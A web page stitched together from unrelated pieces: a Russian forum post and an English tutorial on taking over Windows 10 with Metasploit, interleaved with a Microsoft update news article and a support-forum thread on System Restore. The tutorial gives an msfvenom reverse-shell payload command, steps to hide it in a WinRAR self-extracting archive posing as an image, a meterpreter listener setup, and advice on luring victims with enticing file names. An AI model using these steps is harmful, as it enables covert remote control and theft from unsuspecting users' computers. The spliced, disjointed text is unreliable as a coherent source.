Статья Hack Windows 10 (meterpreter)

Привет всем! В этой небольшой теме я хочу показать очередной способ взлома Windows, на этот раз это Windows 10. После обновления Metasploit в нем появился достаточно любопытный эксплоит (хотя, может он и раньше там был) — regsvr32_applocker_bypass_server

Итак, приступим, в терминале, вводим следующие команды:

> msfconsole (запускаем Metaslpoit)

> options (посмотрим доступные настройки эксплойта)

> set payload windows/meterpreter/reverse_tcp

> set LHOST 192.168.0.101 (Ваш локальный адрес)

Если все прошло успешно видим следующее:

То, что я выделил цветом, это команда, которую необходимо ввести в командной строке целевого хоста, для получения сессии meterpreter.

После выполнения команды, в терминале Kali Linux откроется сессия:

> sessions –I 1 (Подключимся к ней)

> ps (Посмотрим список процессов на целевом хосте)

Тестировал я этот способ на реальном ПК с установленной на нем:

Windows 10 — download this update NOW, or risk being hacked, Microsoft warns

MICROSOFT urges quick upgrade to Windows 10 Anniversary Update before security protection drops for original release.

Microsoft is urging users to upgrade Windows 10 Anniversary Update now

When you subscribe we will use the information you provide to send you these newsletters. Sometimes they’ll include recommendations for other related newsletters or services we offer. Our Privacy Notice explains more about how we use your data, and your rights. You can unsubscribe at any time.

Windows 10 users have been warned that their security could be at risk unless they update to the latest software.

Microsoft has issued a hurry-up to users that have yet to upgrade to the Windows 10 Anniversary Update before it drops service support for original version of its software in May.

The Windows 10 Anniversary Update was released last August, a year after the initial release of Windows 10, containing a number of new upgrades and improvements to Microsoft’s original launch.

Windows 10 Anniversary Update: 13 tips, tricks and hidden features you should be using

MICROSOFT pushed out its latest blockbuster update for Windows 10 earlier this month. Dubbed Anniversary Update, it’s packed with improvements, tweaks and never-before-seen features. Here are 13 tricks, tips and new features you should definitely already be using in the upgraded operating system.

Windows 10 Anniversary Update rolled-out on August 2nd, bringing new features to Cortana, improvements to the redesigned Start Menu and Live Tiles

Writing in its TechNet blog, Microsoft warns that it will be ending service support for the original build of Windows 10 this May.

This means that from the end of that month, anyone who has failed to update their PC sufficiently could be at risk of security hacks and attacks.

Microsoft says this decision continues its policy of supporting only the two most recent releases of Windows 10, with only the Anniversary Update and its recently-patched versions being included.

The note does mention the “current branch for business (CBB)” versions, meaning that consumer editions may not be as affected, but for now we will have to wait for confirmation.

Microsoft says the Windows 10 Anniversary Update offers far better security protection

Windows 10 Anniversary Update is available to download now as a free upgrade, although the install process can take some time.

The release brings a range of improvements and upgrades for users, including a redesigned Start Menu (with twice as many adverts as the previous version), new handwriting recognition software, enhanced capabilities for Cortana and more.

Windows 10 been hacked

Replies (11) 

* Please try a lower page number.

* Please enter only numbers.

* Please try a lower page number.

* Please enter only numbers.

Please provide a couple of screenshots to show what you are seeing on your PC . . .

When you say your system and network is empty — are all your files gone?

When you say everything is being redirected to somewhere — is that when you try to save a file?

Did you receive a large Windows Update before all this happened?

Power to the Developer!

MSI GV72 — 17.3″, i7-8750H (Hex Core), 32GB DDR4, 4GB GeForce GTX 1050 Ti, 256GB NVMe M2, 2TB HDD

Was this reply helpful?

Sorry this didn’t help.

Great! Thanks for your feedback.

How satisfied are you with this reply?

Thanks for your feedback, it helps us improve the site.

How satisfied are you with this reply?

Thanks for your feedback.

Sorry to hear you’re experiencing this issue!

It could be a virus and not Hack. Please try to restrore your system to an old saved point.
This option takes your PC back to an earlier point in time, called a system restore point. Restore points are generated when you install a new app or driver, and when you create a restore point manually. Restoring won’t affect your personal files, but it will remove apps, drivers, and updates installed after the restore point was made.

1- In the search box on the taskbar, type control panel, and then choose it from the list of results
2- In the Control Panel search box, type recovery.
3- Select Recovery > Open System Restore.
4- In the Restore system files and setting box, select Next.
5- Select the restore point that you want to use in the list of results, and then select Scan for affected programs.

If you don’t see the restore point that you want to use, select the Show more restore points check box to see more restore points.
If you’re not seeing any restore points, it might be because system protection isn’t turned on. Here’s how to check:
In the search box on the taskbar, type control panel, and then choose it from the list of results.
In the Control Panel search box, type recovery.
Select Recovery > Configure System Restore > Configure and see if the Turn on system protection option is selected.
If the Turn on system protection option is not selected, system protection isn’t turned on and there aren’t any restore points. In this scenario, you won’t be able to recovery your PC using a system restore point and will need to use one of the other recovery options listed on this page.
If the Turn on system protection option is selected, continue with step 6.

How to hack windows 10 with a image – In Depth tutorial

Today we will learn how to hack windows with an image manually with Metasploit and WinRAR. I know from the name the hack might seem difficult but in reality, hacking windows with an image is very easy and straight forward. seeing how dangerous it is. Anyone with a computer can do it. This hack is pretty easy to understand and can show how vulnerable windows os truly is. So without further ado, let’s start hacking windows.

This hack will be done in 3 parts:

• Create a Metasploit Payload for hacking windows
• Inject that Payload to an Image
• Start your listener to intercept the remote connection

Requirements for this hack

• Kali Linux OS
• Windows System for merging the virus with an image
• Image File with .jpg extension (Any image is fine)
• Winrar installed on the windows system

1: Create a Metasploit payload:

Step 1: To make the Metasploit Payload

Open a Kali Linux terminal.

Step 2: Now type the following command to create a reverse shell payload.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.132 LPORT=4444 -f exe -o virus.exe

Make sure to change the LHOST to your local IP address.

Use ifconfig in Linux to check your IP.

Step 3: Once you have created the virus, copy it to your windows machine. For Vmware direct copy-paste works just as well. Note this file is a remote access virus.

2. Bind Payload to an Image to make a Malicious image.

Step 1: On your Windows system copy the file to the desktop

Step 2: Download any image from the internet and save it on your desktop. We will call it Imagehack.jpg

Step 3: Now make a .ico (icon) file from the .jpg image. Use the website icoconvert for making the .ico file from the jpg file as shown.

Step 4: Collect all the three files virus.exe, imagehack.jpg & imagehack.ico in the same folder.

Step 5: Now select the file imagehack.jpg and virus.exe, right-click and select the option “Add to archive”. This option is added by WinRAR. You need WinRAR installed for this hack to work as intended.

Step 6: In the Archive option, You need to select the following settings:

• Compression method to best
• Create SFX archive
• Archive format as rar

Step 7: Now, once the general settings are set. Click on the Advanced tab, click on SFX options and click OK.

Step 8: Now in the SFX options tab, click on the update tab and select the following settings

• Extract and update
• Overwrite all files

Step 9: Now select the setup tab and make sure you can see the following in the same order:

imagehack.jpg

virus.exe

The order is important because the first imagehack.jpg will open and then our Payload file, i.e. virus.exe, will be executed in the background.

Step 8: From the Text and Icon tab and select the icon file you created and load it to SFX icon from file set as shown

Step 9: Now navigate to modes tab and click on Hide all as shown in the image below:

Step 10: Now click on OK and the malicious Image will be created. This malicious file can be used to hack any windows device with an image.

Step 11: Now, you need to send this file to the target. Before that, let’s get our listener started on our end.

3. Starting your Listener in Kali Linux for reverse shell

Step 1: Open a Kali Linux terminal and type the following to open Metasploit

msfconsole

Step 2: Now type the following commands in order to start the listener in Metasploit

use multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.192.174.132

set LPORT 4444

Make sure you use the correct LHOST and LPORT settings as you did while creating the virus file.

Step 3: Now, once everything is set as needed, Execute the listener:

exploit

Step 4: Now, you need to use social engineering to send the file to the target victim. Make sure to use convincing images and names. Using the name imagehack as I did will not make the target click the victim. Hot girl or funny pic would be better named for the files.

As soon as target opes the file, the virus will be executed, and an image will be shown to the target who will think nothing is wrong. But we just got a reverse shell to the target.

Step 7: As you can see, I got a reverse shell on Metasploit. Type help to see the list of commands you can use.

Commonly asked questions about hacking windows with an Image:

Q1 Is hacking windows 10 devices legal?

No, hacking windows 10 is not legal. This post is an educational post to show how hackers can hack windows with an Image.

Q2 The Malicious Image file I made is detected as a virus by antivirus. What do I do?

Do not worry; you are safe. The alert is because you made your own virus, which is hidden in the image file. The antivirus software might detect the virus. Which only means you have a great antivirus.

Q3. How can hack my friends or girlfriends pc with this hack?

This hack is only for educational purposes, not for hacking people. We do not support any illegal hacking. Kindly refrain from such comments and requests.

Q4. Does this hack work on all versions of Windows?

Yes, it does work on all versions of windows; however, updated windows might detect it as a virus. An antivirus will definitely detect it as a virus.

Q.5 How can I can perform this hack over the internet?

In my previous article of hacking windows with a link, I have shown how to make hacks possible on the internet. Check it out.

Hope you liked this article and you learned how to hack windows with an image. Donate to support. Keep sharing the articles. Happy Hacking.